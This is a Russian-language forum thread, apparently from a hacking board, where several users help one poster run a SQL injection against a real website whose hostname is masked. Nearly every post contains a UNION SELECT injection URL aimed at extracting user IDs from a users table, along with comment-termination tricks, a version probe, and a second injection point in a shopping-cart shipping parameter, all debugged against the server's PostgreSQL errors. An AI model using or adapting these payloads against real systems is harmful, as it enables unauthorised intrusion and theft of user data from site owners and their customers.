хм... а с чего ты взял, что это MySQL это Postgre как я понимаю...

и вобще че сюда то постишь

__________________
Карфаген должен быть разрушен...

Scipio, не факт. Это может быть что угодно.

zjuk@, во-первых ты определись с версией, а во-вторых напиши запрос по нормальному... Я там не вижу отсечение оригинального запроса, и не вижу нормальной инъекции в переменную... Ты можешь вырезать хост из УРЛЫ если это протеворечит твоим религиозным взглядам, но будь добр оставить URI с инжектируемым запросом 1:1 как ты это пишешь в браузере, иначе гадать можно до вечера...

groundhog

да не вопрос, вот полная строка тока без урла http://ххххх.уу/index.da?ln=est&mid= -1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users

Насчёт версии MySql определить не удалсоь, всё что известно вот:
Apache/2.0.52 (Gentoo/Linux) PHP/5.0.3
Last-Modified=Tue, 07 Mar 2006

причём все стандартные ошибки, например: column X not exist, schema Х not exist система выдаёт без проблем, однако походу как только все поля вернно определны, то возникает злощастная relation "cur" does not exist, чтоб её...

Полный код ошибки в студию...

Ну опять же, комент может и не нужен, но лучше поставить:

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users/*

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users+--+

Попробуй не -1 а 99999

http://ххххх.уу/index.da?ln=est&mid=99999+UNION+SELECT+null,userid ,null,null,null,null,nul l,null+from+public.users/*

И что тебе мешает посмотреть версию?

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,VERSION(),null,null,null,null, nul l,null+from+public.users/*

И зачем ты лезешь в какую-то схему public? Твой пользователь работает в рамках своей схемы и 99 шансов из 100 что у него нету доступа в схемы других пользователей...

З.Ы. Послушай Кэша, напиши полную ошибку которую он выводит.

postgreы это

и гугл думает вот что http://www.google.com/search?rls=en&q=relation+does+not+exist

и если коротко, то дело в расстановке ковычек, коментария и таблица.столбец

select * from "X"."Y"

В Постгрес, идентификаторы употребляются в кавычках, когда они содержат пробел, или имеют регитрозависимое описание... Имхо, проблема не в этом.

Вроде как я вычислил этот сайт. Попробуй так, только вначале надо зарегистрироваться, что то купить зайти в корзину и в количестве нажать + http://xxxxxxxxx/index.da?ln=rus&do=my_cart&shipping_method=-10%20union%20select%201111,2222333--
Выводиться описание товара, а рядом с полем метод доставки вывод (у меня 2222333).
Пробуй

Спасибо за ответы.
Вывожу полный список ошибок. прикол в том, что помимо белого окна браузера и короткой строки ошибки больше ничего не выходит.

groundhog
всё тобой перечисленное, мною до этого перепробованно много раз и забито, потому что:

http://xxxxxx/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users/*
ERROR: unterminated /* comment at or near "/* ORDER BY cur.jrk ASC " at character 431

http://ххххх.уу/index.da?ln=est&mid=-1+UNION+SELECT+null,userid,null,null,null,null,nul l,null+from+public.users+--+
ERROR: relation "cur" does not exist

если 9999, то:
ERROR: relation "cur" does not exist

VERSION() не катит, потому что
ERROR: UNION types bigint and text cannot be matched

Elekt
при попытке поставить что-либо в ковычках, даже в хтмл формате жёстко матириться, в каком бы месте я их не ставил:
ERROR: syntax error at or near "\" at character ххх

Red_Red1
твой вариант в разроботке, пока...